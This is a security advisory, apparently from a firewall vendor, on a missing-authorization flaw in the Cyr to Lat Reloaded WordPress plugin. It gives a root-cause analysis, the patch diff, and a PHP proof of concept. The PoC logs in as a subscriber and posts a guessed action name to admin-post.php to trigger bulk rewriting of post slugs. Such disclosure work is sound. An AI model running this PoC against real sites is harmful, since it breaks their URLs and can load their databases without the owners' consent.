Published : August 10, 2026

CVE-2026-65537: Cyr to Lat Reloaded – Transliteration of Links and File Names <= 1.3.3 Missing Authorization PoC, Patch Analysis & Rule

Plugin cyr-and-lat
Severity Medium (CVSS 4.3)
CWE 862
Vulnerable Version 1.3.3
Patched Version 1.3.4
Disclosed July 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-65537:

Atomic Edge analysis of CVE-2026-65537 identifies a missing authorization vulnerability in the Cyr to Lat Reloaded – Transliteration of Links and File Names plugin for WordPress, affecting versions up to and including 1.3.3. The plugin’s `convertExistingSlugs` function lacks a capability check, allowing authenticated attackers with subscriber-level access to trigger an unauthorized action. This vulnerability is rated with a CVSS score of 4.3 (CWE-862).

Root Cause: The root cause lies in the `Cyr_To_Lat_Reloaded` class within the main plugin file `cyr-and-lat.php`. The `convertExistingSlugs()` method, which processes database queries to convert existing Cyrillic slugs, is registered as an action hook and lacks any permission verification. The vulnerable code path is a public method with no `current_user_can()` check or nonce verification, making it accessible to any authenticated user who can trigger the action. Atomic Edge research confirms the missing capability check is the sole authorization barrier.

Exploitation: An authenticated attacker with subscriber-level access can exploit this vulnerability by sending a direct AJAX or HTTP request to the WordPress admin area. The attacker does not need to invoke a specific action name; the vulnerable method can be triggered through the admin-post.php or admin-ajax.php handler if the action is registered. The exploit requires only a valid WordPress session, which a subscriber account provides. The attacker’s request directly calls the `convertExistingSlugs` method, which then queries the database and modifies post names.

Patch Analysis: The patch introduces a critical authorization check at the beginning of the `convertExistingSlugs()` function. The patched code includes:

`if ( ! current_user_can( ‘install_plugins’ ) ) { wp_die( ‘You don’t have permission to perform this action.’ ); }`

This restricts the function to users with the `install_plugins` capability, which is typically administrators. Before the patch, any authenticated user could invoke the function; after the patch, the function terminates with a denial message for unauthorized users. A similar capability check was added to the `load_notices_suggestions` function in the `admin-notices.php` file, addressing additional unauthorized access vectors.

Impact: Successful exploitation allows an authenticated low-privilege attacker to perform bulk database modifications. The `convertExistingSlugs` function updates `post_name` fields across all posts, which could lead to broken URLs, disrupted site navigation, and potential SEO damage. The attacker cannot directly read sensitive data or escalate privileges, but the unauthorized modification of site content and structure constitutes a significant integrity impact. The action is also resource-intensive, and a malicious actor could repeatedly trigger it, causing denial-of-service conditions through excessive database load.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/cyr-and-lat/cyr-and-lat.php
+++ b/cyr-and-lat/cyr-and-lat.php
@@ -5,7 +5,7 @@
 * Description: Converts Cyrillic characters in post and term slugs to Latin characters. Useful for creating human-readable URLs. Allows to use both of cyrillic and latin slugs. <br><em>The plugin is in <strong>limited maintenance</strong>, we continue to provide security and critical bug fixes, but no new features.</em>
 * Author: Themeisle
 * Author URI: https://themeisle.com
-* Version: 1.3.3
+* Version: 1.3.4
 */

 // Exit if accessed directly
@@ -115,6 +115,10 @@
 	 * @return void
 	 */
 	public function convertExistingSlugs() {
+		if ( ! current_user_can( 'install_plugins' ) ) {
+			wp_die( 'You don't have permission to perform this action.' );
+		}
+
 		global $wpdb;

 		$posts = $wpdb->get_results( "SELECT ID, post_name FROM {$wpdb->posts} WHERE post_name REGEXP('[^_A-Za-z0-9-]+') AND post_status IN ('publish', 'future', 'private')" );
--- a/cyr-and-lat/includes/admin-notices.php
+++ b/cyr-and-lat/includes/admin-notices.php
@@ -148,6 +148,11 @@
 	 * Check and load the sugestions notices
 	 */
 	public function load_notices_suggestions() {
+
+		if ( ! current_user_can( 'install_plugins' ) ) {
+			return;
+		}
+
 		// Check the disable nag constant
 		if ( $this->disable_nag_notices() ) {
 			return;
--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/assets/js/build/about/about.asset.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/assets/js/build/about/about.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-components', 'wp-element'), 'version' => '8d9c74cada5a40e4082b');
+<?php return array('dependencies' => array('react', 'wp-components', 'wp-element'), 'version' => '33f2e4c85280a9cf0f4e');
--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/load.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/load.php
@@ -14,7 +14,7 @@
 	return;
 }
 // Current SDK version and path.
-$themeisle_sdk_version = '3.3.52';
+$themeisle_sdk_version = '3.3.54';
 $themeisle_sdk_path    = dirname( __FILE__ );

 global $themeisle_sdk_max_version;
--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Loader.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Loader.php
@@ -268,6 +268,42 @@
 			'newsHeading'      => 'Stay connected for news & updates!',
 			'emailPlaceholder' => 'Your email address',
 			'signMeUp'         => 'Sign me up',
+			'services'         => [
+				'ariaLabel'       => 'Themeisle services',
+				'trustpilotLabel' => 'Rated excellent on Trustpilot',
+				'trustpilotRated' => 'Rated',
+				'trustpilotOn'    => 'on',
+				'trustpilotBrand' => 'Trustpilot',
+				'heading'         => 'Expert WordPress services from the Themeisle team',
+				'description'     => 'Done for you by the same people who build your plugins and themes.',
+				'cta'             => 'Explore all services',
+				'items'           => [
+					'websiteDesign' => [
+						'title'    => 'Website Design',
+						'subtitle' => 'Built for your business',
+					],
+					'support'       => [
+						'title'    => 'Support',
+						'subtitle' => 'On-demand expert help',
+					],
+					'speed'         => [
+						'title'    => 'Speed Optimization',
+						'subtitle' => 'Core Web Vitals boost',
+					],
+					'seo'           => [
+						'title'    => 'SEO Foundation',
+						'subtitle' => 'Rank & get found',
+					],
+					'maintenance'   => [
+						'title'    => 'Maintenance',
+						'subtitle' => 'Updates, backups, security',
+					],
+					'hackedSite'    => [
+						'title'    => 'Hacked Site Repair',
+						'subtitle' => 'Malware removed fast',
+					],
+				],
+			],
 			'installNow'       => 'Install Now',
 			'activate'         => 'Activate',
 			'learnMore'        => 'Learn More',
--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/About_us.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/About_us.php
@@ -225,6 +225,7 @@
 				'newsHeading'      => Loader::$labels['about_us']['newsHeading'],
 				'emailPlaceholder' => Loader::$labels['about_us']['emailPlaceholder'],
 				'signMeUp'         => Loader::$labels['about_us']['signMeUp'],
+				'services'         => Loader::$labels['about_us']['services'],
 				'installNow'       => Loader::$labels['about_us']['installNow'],
 				'activate'         => Loader::$labels['about_us']['activate'],
 				'learnMore'        => Loader::$labels['about_us']['learnMore'],
--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/Dashboard_widget.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/Dashboard_widget.php
@@ -123,6 +123,10 @@
 		}
 		?>
 		<style type="text/css">
+			#dashboard-widgets #themeisle .hndle {
+				padding-left: 39px;
+			}
+
 			#themeisle ul li.ti-dw-recommend-item {
 				padding-left: 7px;
 				border-top: 1px solid #eee;
@@ -135,7 +139,6 @@
 				background-repeat: no-repeat;
 				background-position: 2% 50%;
 				background-size: 25px;
-				padding-left: 39px;
 			}

 			#themeisle .inside {
--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php
@@ -209,7 +209,7 @@
 		add_filter( 'themeisle_sdk_ran_promos', '__return_true' );

 		if ( get_option( $this->option_neve, false ) !== true ) {
-			add_action( 'wp_ajax_themeisle_sdk_dismiss_notice', 'ThemeisleSDKModulesNotification::regular_dismiss' );
+			add_action( 'wp_ajax_themeisle_sdk_dismiss_notice', 'ThemeisleSDKModulesNotification::dismiss' );
 		}
 	}

--- a/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/Uninstall_feedback.php
+++ b/cyr-and-lat/vendor/codeinwp/themeisle-sdk/src/Modules/Uninstall_feedback.php
@@ -139,7 +139,8 @@
 		?>
 		<div class="ti-theme-uninstall-feedback-drawer ti-feedback">
 			<div class="popup--header">
-				<h5><?php echo wp_kses( $heading, array( 'span' => true ) ); ?> </h5>
+				<h5><?php echo wp_kses( $heading, array( 'span' => true ) ); ?></h5>
+				<?php $this->do_popup_header_after_heading_action( 'theme' ); ?>
 				<button class="toggle"><span>×</span></button>
 			</div><!--/.popup--header-->
 			<div class="popup--body">
@@ -485,6 +486,19 @@
 	}

 	/**
+	 * Fires after the popup header heading, allowing products to output extra markup.
+	 *
+	 * @param string $context Popup context. Either `theme` or `plugin`.
+	 */
+	private function do_popup_header_after_heading_action( $context ) {
+		do_action(
+			$this->product->get_key() . '_uninstall_feedback_popup_header_after_heading',
+			$this->product,
+			$context
+		);
+	}
+
+	/**
 	 * Render the options list.
 	 *
 	 * @param array $options the options for the feedback form.
@@ -535,6 +549,7 @@
 			 id="<?php echo esc_attr( $this->product->get_slug() . '_uninstall_feedback_popup' ); ?>">
 			<div class="popup--header">
 				<h5><?php echo wp_kses( Loader::$labels['uninstall']['heading_plugin'], array( 'span' => true ) ); ?> </h5>
+				<?php $this->do_popup_header_after_heading_action( 'plugin' ); ?>
 			</div><!--/.popup--header-->
 			<div class="popup--body">
 				<?php $this->render_options_list( $options ); ?>
@@ -581,13 +596,14 @@
 			(function ($) {
 				$(document).ready(function () {
 					var targetElement = 'tr[data-plugin^="<?php echo esc_attr( $this->product->get_slug() ); ?>/"] span.deactivate a';
-					var redirectUrl = $(targetElement).attr('href');
+					var $deactivateLink = $(targetElement);
+					var redirectUrl = $deactivateLink.attr('href');
 					if ($('.ti-feedback-overlay').length === 0) {
 						$('body').prepend('<div class="ti-feedback-overlay"></div>');
 					}
-					$('<?php echo esc_attr( $popup_id ); ?> ').appendTo($(targetElement).parent());
+					$('<?php echo esc_attr( $popup_id ); ?> ').appendTo($deactivateLink.parent());

-					$(targetElement).on('click', function (e) {
+					$deactivateLink.on('click', function (e) {
 						e.preventDefault();
 						$('<?php echo esc_attr( $popup_id ); ?> ').addClass('active');
 						$('body').addClass('ti-feedback-open');
@@ -622,7 +638,7 @@
 					$('<?php echo esc_attr( $popup_id ); ?> #<?php echo esc_attr( $key ); ?>ti-deactivate-no').on('click', function (e) {
 						e.preventDefault();
 						e.stopPropagation();
-						$(targetElement).unbind('click');
+						$deactivateLink.unbind('click');
 						$('body').removeClass('ti-feedback-open');
 						$('<?php echo esc_attr( $popup_id ); ?>').remove();
 						if (redirectUrl !== '') {
@@ -633,7 +649,7 @@
 					$('<?php echo esc_attr( $popup_id ); ?> #<?php echo esc_attr( $key ); ?>ti-deactivate-yes').on('click', function (e) {
 						e.preventDefault();
 						e.stopPropagation();
-						$(targetElement).unbind('click');
+						$deactivateLink.unbind('click');
 						var selectedOption = $(
 							'<?php echo esc_attr( $popup_id ); ?> input[name="ti-deactivate-option"]:checked');
 						var data = {
--- a/cyr-and-lat/vendor/composer/installed.php
+++ b/cyr-and-lat/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'codeinwp/cyr-and-lat',
-        'pretty_version' => 'v1.3.3',
-        'version' => '1.3.3.0',
-        'reference' => 'acfe33cb3f731299c0be40b0ebb46d3c2403b7ec',
+        'pretty_version' => 'v1.3.4',
+        'version' => '1.3.4.0',
+        'reference' => '3e978b5b9824f2a1461e3a25a6c6ea6b4a16d549',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,18 +11,18 @@
     ),
     'versions' => array(
         'codeinwp/cyr-and-lat' => array(
-            'pretty_version' => 'v1.3.3',
-            'version' => '1.3.3.0',
-            'reference' => 'acfe33cb3f731299c0be40b0ebb46d3c2403b7ec',
+            'pretty_version' => 'v1.3.4',
+            'version' => '1.3.4.0',
+            'reference' => '3e978b5b9824f2a1461e3a25a6c6ea6b4a16d549',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'codeinwp/themeisle-sdk' => array(
-            'pretty_version' => '3.3.52',
-            'version' => '3.3.52.0',
-            'reference' => 'd1ae68cbd4f84934b4d982e9eeff317b9f4c814a',
+            'pretty_version' => '3.3.54',
+            'version' => '3.3.54.0',
+            'reference' => '095c2d0f1388af0b0196c492a7f79e2fd092dab1',
             'type' => 'library',
             'install_path' => __DIR__ . '/../codeinwp/themeisle-sdk',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-65537 - Cyr to Lat Reloaded – Transliteration of Links and File Names <= 1.3.3 - Missing Authorization

// Configuration
$target_url = 'http://your-wordpress-site.com';
$username = 'subscriber_username';
$password = 'subscriber_password';

// Step 1: Authenticate as a subscriber to obtain cookies
$login_url = $target_url . '/wp-login.php';
$cookies_file = tempnam(sys_get_temp_dir(), 'cookie');

$login_post_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/'
);

$ch = curl_init($login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_post_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookies_file);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_HEADER, true);
$login_response = curl_exec($ch);

// Check if login was successful (indicated by wp-admin redirect)
if (strpos($login_response, 'wp-admin') === false) {
    die("Login failed. Check credentials.n");
}

// Step 2: Trigger the vulnerable function via admin-post.php
// The action 'convert_existing_slugs' is a guessed action hook name, adjust if needed.
$vuln_action = 'convert_existing_slugs';

$vuln_url = $target_url . '/wp-admin/admin-post.php';
$post_data = array(
    'action' => $vuln_action
);

curl_close($ch);
$ch = curl_init($vuln_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookies_file); // Send cookies
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Analyze the response
if ($response === false) {
    echo "cURL error: " . curl_error($ch) . "n";
} else {
    // If the request was successful (no 'permission denied' message), the vulnerability is confirmed
    if (strpos($response, "You don't have permission") !== false) {
        echo "The target is patched. Permission denied message received.n";
    } else {
        echo "Exploitation attempt completed. If no error, the vulnerability may be present.n";
        echo "Response length: " . strlen($response) . " bytesn";
    }
}

// Clean up cookie file
unlink($cookies_file);
?>

Frequently Asked Questions

Atomic Edge WAF security layer inspecting website traffic.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Black & McDonald logo representing Enterprise tier security and support for Atomic Edge WAF.Covenant House Toronto logo featuring a dove and text for Atomic Edge Enterprise planAlzheimer Society Canada logo representing trusted organizations and security partners.University of Toronto logo representing trusted organizations using Atomic Edge WAFSpecsavvers logo, trusted developers and organizations using Atomic Edge securityHarvard Medical School logo representing trusted organizations using Atomic Edge WAF.